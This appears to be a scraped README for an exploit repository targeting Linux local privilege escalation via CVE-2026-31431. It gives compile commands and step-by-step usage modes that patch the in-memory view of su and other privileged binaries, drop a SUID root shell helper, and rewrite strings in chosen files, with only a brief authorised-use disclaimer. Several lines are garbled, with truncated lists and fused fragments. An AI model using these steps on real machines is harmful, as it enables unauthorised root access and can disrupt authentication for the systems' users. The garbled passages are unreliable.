
Linux local privilege escalation exploits for CVE-2026-31431, including raw and recoverable workflows.
These Linux LPE exploit implementations are runtime-destructive.
They overwrite the live page-cache view of privileged targets such as:
supatch modeThis is usually not a normal persistent on-disk edit, but it does change runtime behavior and can affect authentication / privilege flow immediately.
This repository does not provide a fully non-destructive root mode.
copyfail_raw_su_root.ccopyfail_portable_lpe.cBoth are Linux-only.
Prebuilt binaries for additional architectures may be added in future updates.
gcc -O2 -s copyfail_portable_lpe.c -o copyfail_portable_lpe
gcc -O2 -s copyfail_raw_su_root.c -o copyfail_raw_su_root
For copyfail_portable_lpe.c, running:
./copyfail_portable_lpe
uses auto-revert by default.
That means it will try the recoverable workflow first:
If recoverable mode fails, the program prints fallback mode hints.
Minimal raw variant:
susu./copyfail_raw_su_root
General variant with multiple modes.
Explicit non-reverting mode:
./copyfail_portable_lpe auto
Recoverable-first mode:
./copyfail_portable_lpe
./copyfail_portable_lpe auto-revert
Drop a SUID bash helper without revert:
./copyfail_portable_lpe helper ./.rootsh
Drop a helper, then attempt to restore patched targets:
./copyfail_portable_lpe helper-revert ./.rootsh
Same-length string replacement on a chosen file:
./copyfail_portable_lpe patch <file> <find> <replace>
Raw su patch path:
./copyfail_portable_lpe raw-su-elf
auto-revert and helper-revert are still destructive during exploitation.
They are only "recoverable" in the sense that they:
So this is destructive-then-revert, not truly non-destructive.
auto / auto-revert / helper / helper-revert / patch: Linux-oriented, less tightly coupled to CPU architecture when compiled on-targetraw-su-elf: x86_64 Linux onlyThis repository is provided for:
Do not use these materials against systems, accounts, or networks without explicit permission from the owner.
The author and contributors provide this content as-is, without warranty, and accept no responsibility for misuse, damage, data loss, service disruption, or legal consequences resulting from use of the code or techniques in this repository.